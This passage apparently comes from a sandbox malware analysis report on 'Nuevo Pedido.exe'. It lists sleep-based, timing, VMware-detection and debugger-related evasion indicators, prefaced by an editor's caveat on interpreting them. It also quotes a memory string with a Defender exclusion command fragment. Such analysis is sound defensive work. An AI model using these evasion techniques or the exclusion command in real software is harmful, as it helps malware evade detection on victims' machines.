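Two caveats apply when reading the results. Byte-pattern hits are not disassembly: 0F 31 can occur inside an immediate or a data table, so confirm each pair sits on an instruction boundary before reporting it. And fs:[30h] reads are routine in ntdll itself; the addresses listed further down (0x019BB1E1 through 0x01A4B8D0) fall inside the region where the report found a wntdll.pdb string in the process 3 dump at 0x1990000, so the editor's reading is that many of them belong to a freshly mapped ntdll copy rather than to checks the malware author wrote. Treat them as context for the hollowing, not as independent anti-debug evidence.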
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -6456360425798339s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -240000s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6404Thread sleep count: 834 > 30
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239843s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6404Thread sleep count: 1723 > 30
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6324Thread sleep time: -32847s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239717s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239609s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239499s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239390s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239250s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239139s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239015s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -238904s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -238781s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -238671s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -238561s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -238452s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -238343s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -238046s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -237796s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -237437s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -237250s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -236890s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -236781s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6348Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 6388Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\cscript.exe TID: 4140Thread sleep time: -34000s >= -30000s
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_004088D0 rdtsc
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 240000
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239843
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239717
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239609
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239499
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239390
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239250
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239139
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239015
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238904
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238781
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238671
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238561
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238452
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238343
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238046
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 237796
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 237437
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 237250
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 236890
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 236781
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeWindow / User API: threadDelayed 834
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeWindow / User API: threadDelayed 1723
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 240000
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239843
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 32847
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239717
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239609
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239499
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239390
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239250
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239139
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239015
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238904
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238781
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238671
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238561
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238452
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238343
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238046
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 237796
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 237437
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 237250
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 236890
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 236781
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 922337203685477
            Source: Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
            Source: explorer.exe, 00000005.00000000.290480181.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
            Source: Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000005.00000000.290480181.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000005.00000000.290974701.0000000008BB0000.00000004.00000001.sdmpBinary or memory string: E#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
            Source: explorer.exe, 00000005.00000000.279912891.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
            Source: explorer.exe, 00000005.00000000.251514435.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
            Source: explorer.exe, 00000005.00000000.246577528.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
            Source: explorer.exe, 00000005.00000000.251514435.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
            Source: Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_004088D0 rdtsc
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A369A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E2990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EA185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A351BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A351BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A351BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A351BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019DC182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A441E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019BB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019BB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019BB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019B9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019B9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019B9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019D4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019D4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019D4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019D4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019D4120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019DB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019DB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019BB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019BB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019BC962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019B9080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019EF0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019EF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019EF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A33884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A33884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F90AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A4B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A4B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A4B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A4B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A4B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A4B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019B58EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A37016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A37016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A37016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019CB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019CB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019CB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019CB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A84015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A84015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019D0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019D0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A72073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A81074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E2397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A85BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019EB390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019C1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019C1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A6D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A7138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A353CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A353CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019DDBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A7131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019BF358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019BDB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A88B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019BDB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019ED294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019ED294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019CAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019CAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019EFAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019B52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019B52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019B52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019B52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019B52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E2ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E2AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019D3A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019B5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019B5210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019B5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019B5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019BAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019BAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019C8A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A7AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A7AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A6B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A6B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A88A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019B9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019B9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019B9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019B9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A7EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A44257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A805AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A805AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019EFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019EFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019B2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019B2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019B2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019B2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019B2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E35A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A7FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A7FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A7FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A7FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A68DF1 mov eax, dword ptr fs:[00000030h]
